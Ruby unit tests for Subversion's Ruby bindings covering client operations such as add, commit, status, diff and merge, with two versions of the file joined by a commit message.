ctx.prop_set(Svn::Core::PROP_MIME_TYPE, "text/plain", path)
ctx.commit(@wc_path)
assert_equal([[]], items.collect {|item| item.wcprop_changes})
assert_equal([[]], items.collect {|item| item.incoming_prop_changes})
assert_equal([nil], items.collect {|item| item.outgoing_prop_changes})
items = nil
ctx.cp(path, repos_uri2)
assert_equal([nil], items.collect {|item| item.wcprop_changes})
assert_equal([nil], items.collect {|item| item.incoming_prop_changes})
assert_equal([nil], items.collect {|item| item.outgoing_prop_changes})
end
def test_log_msg_func_cancel
log = "sample log"
dir = "dir"
dir_path = File.join(@wc_path, dir)
ctx = make_context(log)
ctx.set_log_msg_func do |items|
raise Svn::Error::Cancelled
end
ctx.mkdir(dir_path)
assert_raise(Svn::Error::Cancelled) do
ctx.commit(@wc_path)
end
end
def test_set_config
log = "sample log"
ctx = make_context(log)
options = {
"groups" => {"collabnet" => "svn.collab.net"},
"collabnet" => {
"http-proxy-host" => "proxy",
"http-proxy-port" => "8080",
},
}
servers_config_file = File.join(@config_path,
Svn::Core::CONFIG_CATEGORY_SERVERS)
File.open(servers_config_file, "w") do |file|
options.each do |section, values|
file.puts("[#{section}]")
values.each do |key, value|
file.puts("#{key} = #{value}")
end
end
end
config = Svn::Core::Config.config(@config_path)
assert_nil(ctx.config)
assert_equal(options, config[Svn::Core::CONFIG_CATEGORY_SERVERS].to_hash)
ctx.config = config
assert_equal(options,
ctx.config[Svn::Core::CONFIG_CATEGORY_SERVERS].to_hash)
end
def test_context_mimetypes_map
context = Svn::Client::Context.new
assert_nil(context.mimetypes_map)
context.mimetypes_map = {"txt" => "text/plain"}
assert_equal({"txt" => "text/plain"}, context.mimetypes_map)
end
def assert_changelists
log = "sample log"
file1 = "hello1.txt"
file2 = "hello2.txt"
src = "Hello"
changelist1 = "XXX"
changelist2 = "YYY"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src)}
File.open(path2, "w") {|f| f.print(src)}
ctx.add(path1)
ctx.add(path2)
ctx.commit(@wc_path)
assert_equal({}, yield(ctx, changelist1))
assert_equal({nil=>[@wc_path,path1,path2]}, yield(ctx, nil))
assert_equal({}, yield(ctx, []))
assert_equal({}, yield(ctx, [changelist1]))
assert_equal({}, yield(ctx, [changelist2]))
ctx.add_to_changelist(changelist1, path1)
assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
assert_equal({changelist1=>[path1],nil=>[@wc_path,path2]}, yield(ctx, nil))
assert_equal({}, yield(ctx, []))
assert_equal({changelist1=>[path1]}, yield(ctx, [changelist1]))
assert_equal({}, yield(ctx, [changelist2]))
assert_equal({}, yield(ctx, changelist2))
ctx.add_to_changelist(changelist2, [path1, path2])
assert_equal({changelist2=>[path1, path2]}, yield(ctx, changelist2))
assert_equal({}, yield(ctx, changelist1))
ctx.add_to_changelist(changelist1, [path1, path2])
assert_equal({changelist1=>[path1, path2]}, yield(ctx, changelist1))
assert_equal({}, yield(ctx, changelist2))
ctx.remove_from_changelists(changelist1, path1)
assert_equal({changelist1=>[path2]}, yield(ctx, changelist1))
ctx.remove_from_changelists(changelist1, [path2])
assert_equal({}, yield(ctx, changelist1))
ctx.add_to_changelist(changelist1, path1)
ctx.add_to_changelist(changelist2, path2)
assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
assert_equal({changelist2=>[path2]}, yield(ctx, changelist2))
assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
assert_equal({changelist2=>[path2]}, yield(ctx, changelist2))
assert_equal({changelist1=>[path1]}, yield(ctx, [changelist1]))
assert_equal({changelist2=>[path2]}, yield(ctx, [changelist2]))
assert_equal({changelist1=>[path1],changelist2=>[path2],nil=>[@wc_path]}, yield(ctx, nil))
assert_equal({}, yield(ctx, []))
assert_equal({changelist1=>[path1],changelist2=>[path2]},
yield(ctx, [changelist1,changelist2]))
ctx.remove_from_changelists(nil, [path1, path2])
assert_equal({}, yield(ctx, changelist1))
assert_equal({}, yield(ctx, changelist2))
end
def test_changelists_get_without_block
assert_changelists do |ctx, changelist_name|
ctx.changelists(changelist_name, @wc_path)
end
end
def test_changelists_get_with_block
assert_changelists do |ctx, changelist_name|
changelists = Hash.new{|h,k| h[k]=[]}
ctx.changelists(changelist_name, @wc_path) do |path,cl_name|
changelists[cl_name] << path
end
changelists
end
end
end
Follow the current notify information behavior.
(Receive absolete path not relative path.)
* subversion/bindings/swig/ruby/test/test_client.rb
(SvnClientTest#assert_mkdir_with_multiple_paths): New assertion.
(SvnClientTest#test_mkdir_with_multiple_paths):
- Rename from test_mkdir_multiple2.
- Use assert_mkdir_with_multiple_paths.
(SvnClientTest#test_mkdir_with_multiple_paths_as_array):
- Rename from test_mkdir_multiple.
- Use assert_mkdir_with_multiple_paths.
git-svn-id: f8a4e5e023278da1e04e203c7fe051e3c4285d88@871423 13f79535-47bb-0310-9956-ffa450edef68
require "my-assertions"
require "util"
require "svn/core"
require "svn/client"
class SvnClientTest < Test::Unit::TestCase
include SvnTestUtil
def setup
setup_basic(true)
end
def teardown
teardown_basic
end
def test_version
assert_equal(Svn::Core.subr_version, Svn::Client.version)
end
def test_add_not_recurse
log = "sample log"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, dir)
uri = "#{@repos_uri}/#{dir}/#{dir}"
ctx = make_context(log)
FileUtils.mkdir(dir_path)
FileUtils.mkdir(path)
ctx.add(dir_path, false)
ctx.commit(@wc_path)
assert_raise(Svn::Error::FS_NOT_FOUND) do
ctx.cat(uri)
end
end
def test_add_recurse
log = "sample log"
file = "hello.txt"
src = "Hello"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
uri = "#{@repos_uri}/#{dir}/#{file}"
ctx = make_context(log)
FileUtils.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(dir_path)
ctx.commit(@wc_path)
assert_equal(src, ctx.cat(uri))
end
def test_add_force
log = "sample log"
file = "hello.txt"
src = "Hello"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
uri = "#{@repos_uri}/#{dir}/#{file}"
ctx = make_context(log)
FileUtils.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(dir_path, false)
ctx.commit(@wc_path)
assert_raise(Svn::Error::ENTRY_EXISTS) do
ctx.add(dir_path, true, false)
end
ctx.add(dir_path, true, true)
ctx.commit(@wc_path)
assert_equal(src, ctx.cat(uri))
end
def test_add_no_ignore
log = "sample log"
file = "hello.txt"
src = "Hello"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
uri = "#{@repos_uri}/#{dir}/#{file}"
ctx = make_context(log)
FileUtils.mkdir(dir_path)
ctx.add(dir_path, false)
ctx.propset(Svn::Core::PROP_IGNORE, file, dir_path)
ctx.commit(@wc_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(dir_path, true, true, false)
ctx.commit(@wc_path)
assert_raise(Svn::Error::FS_NOT_FOUND) do
ctx.cat(uri)
end
ctx.add(dir_path, true, true, true)
ctx.commit(@wc_path)
assert_equal(src, ctx.cat(uri))
end
def test_mkdir
log = "sample log"
dir = "dir"
deep_dir = ["d", "e", "e", "p"]
dir2 = "dir2"
dir_uri = "#{@repos_uri}/#{dir}"
deep_dir_uri = "#{@repos_uri}/#{deep_dir.join('/')}"
dir2_uri = "#{@repos_uri}/#{dir2}"
dir_path = File.join(@wc_path, dir)
deep_dir_path = File.join(@wc_path, *deep_dir)
dir2_path = File.join(@wc_path, dir2)
ctx = make_context(log)
assert(!File.exist?(dir_path))
ctx.mkdir(dir_path)
assert(File.exist?(dir_path))
assert_raises(Svn::Error::EntryExists) do
ctx.add(dir_path)
end
old_rev = ctx.commit(@wc_path).revision
new_rev = ctx.mkdir(dir2_uri).revision
assert_equal(old_rev + 1, new_rev)
assert_raises(Svn::Error::FsAlreadyExists) do
ctx.mkdir(dir2_uri)
end
assert(!File.exist?(dir2_path))
ctx.update(@wc_path)
assert(File.exist?(dir2_path))
assert_raises(Svn::Error::SvnError) do
ctx.mkdir(deep_dir_path)
end
end
def assert_mkdir_with_multiple_paths
log = "sample log"
dir = "dir"
dir2 = "dir2"
dirs = [dir, dir2]
dirs_path = dirs.collect {|d| Pathname(@wc_path) + d}
dirs_full_path = dirs_path.collect {|path| path.expand_path}
ctx = make_context(log)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
assert_equal([false, false], dirs_path.collect {|path| path.exist?})
yield(ctx, dirs_path.collect {|path| path.to_s})
assert_equal(dirs_path.collect {|path| path.to_s}.sort,
infos.collect{|path, notify| path}.sort)
assert_equal([true] * dirs_path.size,
infos.collect{|path, notify| notify.add?})
assert_equal([true, true], dirs_path.collect {|path| path.exist?})
infos.clear
ctx.commit(@wc_path)
assert_equal(dirs_full_path.collect {|path| path.to_s}.sort,
infos.collect{|path, notify| path}.sort)
assert_equal([true] * dirs_path.size,
infos.collect{|path, notify| notify.commit_added?})
end
def test_mkdir_with_multiple_paths
assert_mkdir_with_multiple_paths do |ctx, dirs|
ctx.mkdir(*dirs)
end
end
def test_mkdir_with_multiple_paths_as_array
assert_mkdir_with_multiple_paths do |ctx, dirs|
ctx.mkdir(dirs)
end
end
def test_mkdir_p
log = "sample log"
dir = "parent"
child_dir = "parent/child"
dir_path = Pathname(@wc_path) + dir
child_dir_path = dir_path + "child"
full_paths = [dir_path, child_dir_path].collect {|path| path.expand_path}
ctx = make_context(log)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
assert_equal([false, false], [dir_path.exist?, child_dir_path.exist?])
ctx.mkdir_p(child_dir_path.to_s)
assert_equal(full_paths.collect {|path| path.to_s}.sort,
infos.collect{|path, notify| path}.sort)
assert_equal([true, true],
infos.collect{|path, notify| notify.add?})
assert_equal([true, true], [dir_path.exist?, child_dir_path.exist?])
infos.clear
ctx.commit(@wc_path)
assert_equal(full_paths.collect {|path| path.to_s}.sort,
infos.collect{|path, notify| path}.sort)
assert_equal([true, true],
infos.collect{|path, notify| notify.commit_added?})
end
def test_delete
log = "sample log"
src = "sample source\n"
file = "file.txt"
dir = "dir"
path = File.join(@wc_path, file)
dir_path = File.join(@wc_path, dir)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.mkdir(dir_path)
ctx.commit(@wc_path)
ctx.delete([path, dir_path])
ctx.commit(@wc_path)
assert(!File.exist?(path))
assert(!File.exist?(dir_path))
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.commit(@wc_path)
File.open(path, "w") {|f| f.print(src * 2)}
assert_raises(Svn::Error::ClientModified) do
ctx.delete(path)
end
assert_nothing_raised do
ctx.delete(path, true)
ctx.commit(@wc_path)
end
assert(!File.exist?(path))
end
def test_delete_alias
log = "sample log"
src = "sample source\n"
file = "file.txt"
dir = "dir"
path = File.join(@wc_path, file)
dir_path = File.join(@wc_path, dir)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.mkdir(dir_path)
ctx.commit(@wc_path)
ctx.rm([path, dir_path])
ctx.commit(@wc_path)
assert(!File.exist?(path))
assert(!File.exist?(dir_path))
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.commit(@wc_path)
File.open(path, "w") {|f| f.print(src * 2)}
assert_raises(Svn::Error::ClientModified) do
ctx.rm(path)
end
assert_nothing_raised do
ctx.rm_f(path)
ctx.commit(@wc_path)
end
assert(!File.exist?(path))
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.mkdir(dir_path)
ctx.commit(@wc_path)
ctx.rm_f(path, dir_path)
ctx.commit(@wc_path)
assert(!File.exist?(path))
assert(!File.exist?(dir_path))
end
def test_import
src = "source\n"
log = "sample log"
deep_dir = File.join(%w(a b c d e))
file = "sample.txt"
deep_dir_path = File.join(@wc_path, deep_dir)
path = File.join(deep_dir_path, file)
tmp_deep_dir_path = File.join(@tmp_path, deep_dir)
tmp_path = File.join(tmp_deep_dir_path, file)
ctx = make_context(log)
FileUtils.mkdir_p(tmp_deep_dir_path)
File.open(tmp_path, "w") {|f| f.print(src)}
ctx.import(@tmp_path, @repos_uri)
ctx.up(@wc_path)
assert_equal(src, File.open(path){|f| f.read})
end
def test_import_custom_revprops
src = "source\n"
log = "sample log"
deep_dir = File.join(%w(a b c d e))
file = "sample.txt"
deep_dir_path = File.join(@wc_path, deep_dir)
path = File.join(deep_dir_path, file)
tmp_deep_dir_path = File.join(@tmp_path, deep_dir)
tmp_path = File.join(tmp_deep_dir_path, file)
ctx = make_context(log)
FileUtils.mkdir_p(tmp_deep_dir_path)
File.open(tmp_path, "w") {|f| f.print(src)}
new_rev = ctx.import(@tmp_path, @repos_uri, true, false,
{"custom-prop" => "some-value"}).revision
assert_equal(["some-value", new_rev],
ctx.revprop_get("custom-prop", @repos_uri, new_rev))
ctx.up(@wc_path)
assert_equal(src, File.open(path){|f| f.read})
end
def test_commit
log = "sample log"
dir1 = "dir1"
dir2 = "dir2"
dir1_path = File.join(@wc_path, dir1)
dir2_path = File.join(dir1_path, dir2)
ctx = make_context(log)
assert_equal(Svn::Core::INVALID_REVNUM,ctx.commit(@wc_path).revision)
ctx.mkdir(dir1_path)
assert_equal(0, youngest_rev)
assert_equal(1, ctx.commit(@wc_path).revision)
ctx.mkdir(dir2_path)
assert_equal(Svn::Core::INVALID_REVNUM,ctx.commit(@wc_path, false).revision)
assert_equal(2, ctx.ci(@wc_path).revision)
end
def test_status
log = "sample log"
file1 = "sample1.txt"
file2 = "sample2.txt"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path1 = File.join(@wc_path, file1)
path2 = File.join(dir_path, file2)
ctx = make_context(log)
File.open(path1, "w") {}
ctx.add(path1)
rev1 = ctx.commit(@wc_path).revision
ctx.mkdir(dir_path)
File.open(path2, "w") {}
infos = []
rev = ctx.status(@wc_path) do |path, status|
infos << [path, status]
end
assert_equal(youngest_rev, rev)
assert_equal([dir_path, path2].sort,
infos.collect{|path, status| path}.sort)
dir_status = infos.assoc(dir_path).last
assert(dir_status.text_added?)
assert(dir_status.entry.dir?)
assert(dir_status.entry.add?)
path2_status = infos.assoc(path2).last
assert(!path2_status.text_added?)
assert_nil(path2_status.entry)
infos = []
rev = ctx.st(@wc_path, rev1, true, true) do |path, status|
infos << [path, status]
end
assert_equal(rev1, rev)
assert_equal([@wc_path, dir_path, path1, path2].sort,
infos.collect{|path, status| path}.sort)
wc_status = infos.assoc(@wc_path).last
assert(wc_status.text_normal?)
assert(wc_status.entry.dir?)
assert(wc_status.entry.normal?)
dir_status = infos.assoc(dir_path).last
assert(dir_status.text_added?)
assert(dir_status.entry.dir?)
assert(dir_status.entry.add?)
path1_status = infos.assoc(path1).last
assert(path1_status.text_normal?)
assert(path1_status.entry.file?)
assert(path1_status.entry.normal?)
path2_status = infos.assoc(path2).last
assert(!path2_status.text_added?)
assert_nil(path2_status.entry)
ctx.prop_set(Svn::Core::PROP_IGNORE, file2, dir_path)
infos = []
rev = ctx.status(@wc_path, nil, true, true, true, false) do |path, status|
infos << [path, status]
end
assert_equal(rev1, rev)
assert_equal([@wc_path, dir_path, path1].sort,
infos.collect{|path, status| path}.sort)
infos = []
rev = ctx.status(@wc_path, nil, true, true, true, true) do |path, status|
infos << [path, status]
end
assert_equal(rev1, rev)
assert_equal([@wc_path, dir_path, path1, path2].sort,
infos.collect{|path, status| path}.sort)
end
def test_status_with_depth
setup_greek_tree
log = "sample log"
ctx = make_context(log)
# make everything out-of-date
ctx.prop_set('propname', 'propvalue', @greek.path(:b), :infinity)
recurse_and_depth_choices.each do |rd|
ctx.status(@greek.path(:mu), nil, rd) do |path, status|
assert_equal @greek.uri(:mu), status.url
end
end
expected_statuses_by_depth = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b, :lambda, :e, :f],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
recurse_and_depth_choices.each do |rd|
urls = []
ctx.status(@greek.path(:b), nil, rd) do |path, status|
urls << status.url
end
assert_equal(expected_statuses_by_depth[rd].map{|s| @greek.uri(s)}.sort,
urls.sort,
"depth '#{rd}")
end
end
def test_checkout
log = "sample log"
file = "hello.txt"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
content = "Hello"
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w"){|f| f.print(content)}
ctx.add(path)
ctx.commit(@wc_path)
FileUtils.rm_rf(@wc_path)
ctx.checkout(@repos_uri, @wc_path)
assert(File.exist?(path))
FileUtils.rm_rf(@wc_path)
ctx.co(@repos_uri, @wc_path, nil, nil, false)
assert(!File.exist?(path))
end
def test_update
log = "sample log"
file = "hello.txt"
path = File.join(@wc_path, file)
content = "Hello"
File.open(path, "w"){|f| f.print(content)}
ctx = make_context(log)
assert_nothing_raised do
ctx.update(File.join(@wc_path, "non-exist"), youngest_rev)
end
ctx.add(path)
commit_info = ctx.commit(@wc_path)
FileUtils.rm(path)
assert(!File.exist?(path))
assert_equal(commit_info.revision,
ctx.update(path, commit_info.revision))
assert_equal(content, File.read(path))
FileUtils.rm(path)
assert(!File.exist?(path))
assert_equal([commit_info.revision],
ctx.update([path], commit_info.revision))
assert_equal(content, File.read(path))
assert_raise(Svn::Error::FS_NO_SUCH_REVISION) do
begin
ctx.update(path, commit_info.revision + 1)
ensure
ctx.cleanup(@wc_path)
end
end
assert_nothing_raised do
ctx.update(path + "non-exist", commit_info.revision)
end
end
def test_revert
log = "sample log"
file1 = "hello1.txt"
file2 = "hello2.txt"
file3 = "hello3.txt"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
path3 = File.join(dir_path, file3)
content = "Hello"
ctx = make_context(log)
File.open(path1, "w"){|f| f.print(content)}
File.open(path2, "w"){|f| f.print(content)}
ctx.add(path1)
ctx.add(path2)
ctx.mkdir(dir_path)
File.open(path3, "w"){|f| f.print(content)}
ctx.add(path3)
commit_info = ctx.commit(@wc_path)
File.open(path1, "w"){}
assert_equal("", File.open(path1){|f| f.read})
ctx.revert(path1)
assert_equal(content, File.open(path1){|f| f.read})
File.open(path1, "w"){}
File.open(path2, "w"){}
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
ctx.revert([path1, path2])
assert_equal(content, File.open(path1){|f| f.read})
assert_equal(content, File.open(path2){|f| f.read})
File.open(path1, "w"){}
File.open(path2, "w"){}
File.open(path3, "w"){}
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal("", File.open(path3){|f| f.read})
ctx.revert(@wc_path)
assert_equal(content, File.open(path1){|f| f.read})
assert_equal(content, File.open(path2){|f| f.read})
assert_equal(content, File.open(path3){|f| f.read})
File.open(path1, "w"){}
File.open(path2, "w"){}
File.open(path3, "w"){}
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal("", File.open(path3){|f| f.read})
ctx.revert(@wc_path, false)
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal("", File.open(path3){|f| f.read})
File.open(path1, "w"){}
File.open(path2, "w"){}
File.open(path3, "w"){}
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal("", File.open(path3){|f| f.read})
ctx.revert(dir_path)
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal(content, File.open(path3){|f| f.read})
end
def test_log
log1 = "sample log1"
log2 = "sample log2"
log3 = "sample log3"
src1 = "source1\n"
src2 = "source2\n"
src3 = "source3\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
file3 = "sample3.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
path3 = File.join(@wc_path, file3)
abs_path1 = File.join('', file1)
abs_path2 = File.join('', file2)
abs_path3 = File.join('', file3)
ctx = make_context(log1)
File.open(path1, "w") {|f| f.print(src1)}
ctx.add(path1)
rev1 = ctx.ci(@wc_path).revision
ctx = make_context(log2)
ctx.cp(path1, path2)
rev2 = ctx.ci(@wc_path).revision
ctx = make_context(log3)
ctx.cp(path1, path3)
File.open(path1, "w") {|f| f.print(src2)}
File.open(path3, "w") {|f| f.print(src3)}
rev3 = ctx.ci(@wc_path).revision
changed_paths_lists = {}
revs = {}
messages = {}
keys = [@wc_path, path1, path2, path3]
keys.each do |key|
revs[key] = []
changed_paths_lists[key] = []
messages[key] = []
args = [key, 1, "HEAD", 0, true, nil]
ctx.log(*args) do |changed_paths, rev, author, date, message|
revs[key] << rev
changed_paths_lists[key] << changed_paths
messages[key] << message
end
end
changed_paths_list = changed_paths_lists[@wc_path]
assert_equal([rev1, rev2, rev3], revs[@wc_path])
assert_equal([rev1, rev3], revs[path1])
assert_equal([rev1, rev2], revs[path2])
assert_equal([rev1, rev3], revs[path3])
assert_equal([log1, log2, log3], messages[@wc_path])
expected = [[abs_path1], [abs_path2], [abs_path1, abs_path3]]
actual = changed_paths_list.collect {|changed_paths| changed_paths.keys}
assert_nested_sorted_array(expected, actual)
assert_equal('A', changed_paths_list[0][abs_path1].action)
assert_false(changed_paths_list[0][abs_path1].copied?)
assert_equal('A', changed_paths_list[1][abs_path2].action)
assert_true(changed_paths_list[1][abs_path2].copied?)
assert_equal(abs_path1, changed_paths_list[1][abs_path2].copyfrom_path)
assert_equal(rev1, changed_paths_list[1][abs_path2].copyfrom_rev)
assert_equal('M', changed_paths_list[2][abs_path1].action)
assert_equal('A', changed_paths_list[2][abs_path3].action)
end
def test_log_message
log = "sample log"
file = "hello.txt"
path = File.join(@wc_path, file)
FileUtils.touch(path)
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev = commit_info.revision
assert_equal(log, ctx.log_message(path, rev))
end
def test_blame
log = "sample log"
file = "hello.txt"
srcs = %w(first second third)
infos = []
path = File.join(@wc_path, file)
ctx = make_context(log)
File.open(path, "w") {|f| f.puts(srcs[0])}
ctx.add(path)
commit_info = ctx.commit(@wc_path)
infos << [0, commit_info.revision, @author, commit_info.date, srcs[0]]
File.open(path, "a") {|f| f.puts(srcs[1])}
commit_info = ctx.commit(@wc_path)
infos << [1, commit_info.revision, @author, commit_info.date, srcs[1]]
File.open(path, "a") {|f| f.puts(srcs[2])}
commit_info = ctx.commit(@wc_path)
infos << [2, commit_info.revision, @author, commit_info.date, srcs[2]]
result = []
ctx.blame(path) do |line_no, revision, author, date, line|
result << [line_no, revision, author, date, line]
end
assert_equal(infos, result)
ctx.prop_set(Svn::Core::PROP_MIME_TYPE, "image/DUMMY", path)
ctx.commit(@wc_path)
assert_raise(Svn::Error::CLIENT_IS_BINARY_FILE) do
ctx.ann(path) {}
end
end
def test_diff
log = "sample log"
before = "before\n"
after = "after\n"
file = "hello.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(before)}
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
File.open(path, "w") {|f| f.print(after)}
out_file = Tempfile.new("svn")
err_file = Tempfile.new("svn")
ctx.diff([], path, rev1, path, "WORKING", out_file.path, err_file.path)
out_file.open
assert_match(/-#{before}\+#{after}\z/, out_file.read)
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
out_file = Tempfile.new("svn")
ctx.diff([], path, rev1, path, rev2, out_file.path, err_file.path)
out_file.open
assert_match(/-#{before}\+#{after}\z/, out_file.read)
end
def test_diff_peg
log = "sample log"
before = "before\n"
after = "after\n"
file = "hello.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(before)}
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
File.open(path, "w") {|f| f.print(after)}
out_file = Tempfile.new("svn")
err_file = Tempfile.new("svn")
ctx.diff_peg([], path, rev1, "WORKING", out_file.path, err_file.path)
out_file.open
assert_match(/-#{before}\+#{after}\z/, out_file.read)
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
out_file = Tempfile.new("svn")
ctx.diff_peg([], path, rev1, rev2, out_file.path, err_file.path)
out_file.open
assert_match(/-#{before}\+#{after}\z/, out_file.read)
end
def test_diff_summarize
log = "sample log"
before = "before\n"
after = "after\n"
file = "hello.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(before)}
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
File.open(path, "w") {|f| f.print(after)}
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
diffs = []
ctx.diff_summarize(@wc_path, rev1, @wc_path, rev2) do |diff|
diffs << diff
end
assert_equal([file], diffs.collect {|d| d.path})
kinds = diffs.collect do |d|
[d.kind_normal?, d.kind_added?, d.kind_modified?, d.kind_deleted?]
end
assert_equal([[false, false, true, false]], kinds)
assert_equal([false], diffs.collect {|d| d.prop_changed?})
node_kinds = diffs.collect do |d|
[d.node_kind_none?, d.node_kind_file?,
d.node_kind_dir?, d.node_kind_unknown?]
end
assert_equal([[false, true, false, false]], node_kinds)
end
def test_diff_summarize_peg
log = "sample log"
before = "before\n"
after = "after\n"
before_file = "before.txt"
after_file = "after.txt"
moved_file = "moved.txt"
before_path = File.join(@wc_path, before_file)
after_path = File.join(@wc_path, after_file)
moved_path = File.join(@wc_path, moved_file)
File.open(before_path, "w") {|f| f.print(before)}
ctx = make_context(log)
ctx.add(before_path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
ctx.mv(before_path, after_path)
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
File.open(after_path, "w") {|f| f.print(after)}
commit_info = ctx.commit(@wc_path)
rev3 = commit_info.revision
File.open(after_path, "w") {|f| f.print(before)}
commit_info = ctx.commit(@wc_path)
rev4 = commit_info.revision
ctx.mv(after_path, moved_path)
commit_info = ctx.commit(@wc_path)
rev5 = commit_info.revision
diffs = []
ctx.diff_summarize_peg(@repos_uri, rev3, rev4, rev3) do |diff|
diffs << diff
end
assert_equal([after_file], diffs.collect {|d| d.path})
kinds = diffs.collect do |d|
[d.kind_normal?, d.kind_added?, d.kind_modified?, d.kind_deleted?]
end
assert_equal([[false, false, true, false]], kinds)
assert_equal([false], diffs.collect {|d| d.prop_changed?})
node_kinds = diffs.collect do |d|
[d.node_kind_none?, d.node_kind_file?,
d.node_kind_dir?, d.node_kind_unknown?]
end
assert_equal([[false, true, false, false]], node_kinds)
end
def assert_merge
log = "sample log"
file = "sample.txt"
src = "sample\n"
trunk = File.join(@wc_path, "trunk")
branch = File.join(@wc_path, "branch")
branch_relative_uri = "/branch"
branch_uri = "#{@repos_uri}#{branch_relative_uri}"
trunk_path = File.join(trunk, file)
trunk_path_uri = "#{@repos_uri}/trunk/#{file}"
branch_path = File.join(branch, file)
branch_path_relative_uri = "#{branch_relative_uri}/#{file}"
branch_path_uri = "#{@repos_uri}#{branch_path_relative_uri}"
ctx = make_context(log)
ctx.mkdir(trunk, branch)
File.open(trunk_path, "w") {}
File.open(branch_path, "w") {}
ctx.add(trunk_path)
ctx.add(branch_path)
rev1 = ctx.commit(@wc_path).revision
File.open(branch_path, "w") {|f| f.print(src)}
rev2 = ctx.commit(@wc_path).revision
merged_entries = []
ctx.log_merged(trunk, nil, branch_uri, nil) do |entry|
merged_entries << entry
end
assert_equal_log_entries([], merged_entries)
assert_nil(ctx.merged(trunk))
merged_entries = []
yield(ctx, branch, rev1, rev2, trunk)
ctx.log_merged(trunk, nil, branch_uri, nil) do |entry|
merged_entries << entry
end
assert_equal_log_entries([
[
{branch_path_relative_uri => ["M", nil, -1]},
rev2,
{
"svn:author" => @author,
"svn:log" => log,
},
false,
]
],
merged_entries)
mergeinfo = ctx.merged(trunk)
assert_not_nil(mergeinfo)
assert_equal([branch_uri], mergeinfo.keys)
ranges = mergeinfo[branch_uri].collect {|range| range.to_a}
assert_equal([[1, 2, true]], ranges)
rev3 = ctx.commit(@wc_path).revision
assert_equal(normalize_line_break(src), ctx.cat(trunk_path, rev3))
ctx.rm(branch_path)
rev4 = ctx.commit(@wc_path).revision
yield(ctx, branch, rev3, rev4, trunk)
assert(!File.exist?(trunk_path))
merged_entries = []
ctx.log_merged(trunk, rev4, branch_uri, rev4) do |entry|
merged_entries << entry
end
assert_equal_log_entries([
[
{branch_path_relative_uri => ["D", nil, -1]},
rev4,
{
"svn:author" => @author,
"svn:log" => log,
},
false,
]
] * 2, merged_entries)
ctx.propdel("svn:mergeinfo", trunk)
merged_entries = []
ctx.log_merged(trunk, rev4, branch_uri, rev4) do |entry|
merged_entries << entry
end
assert_equal_log_entries([], merged_entries)
ctx.revert(trunk)
ctx.revert(trunk_path)
File.open(trunk_path, "a") {|f| f.print(src)}
yield(ctx, branch, rev3, rev4, trunk)
rev5 = ctx.commit(@wc_path).revision
assert(File.exist?(trunk_path))
yield(ctx, branch, rev3, rev4, trunk, nil, false, true, true)
statuses = []
ctx.status(trunk) do |path, status|
statuses << status
end
assert_equal([], statuses)
yield(ctx, branch, rev3, rev4, trunk, nil, false, true)
statuses = []
ctx.status(trunk) do |path, status|
statuses << status
end
assert_not_equal([], statuses)
end
def test_merge
assert_merge do |ctx, from, from_rev1, from_rev2, to, *rest|
ctx.merge(from, from_rev1, from, from_rev2, to, *rest)
end
end
def test_merge_peg
assert_merge do |ctx, from, from_rev1, from_rev2, to, *rest|
ctx.merge_peg(from, from_rev1, from_rev2, to, nil, *rest)
end
end
def test_cleanup
log = "sample log"
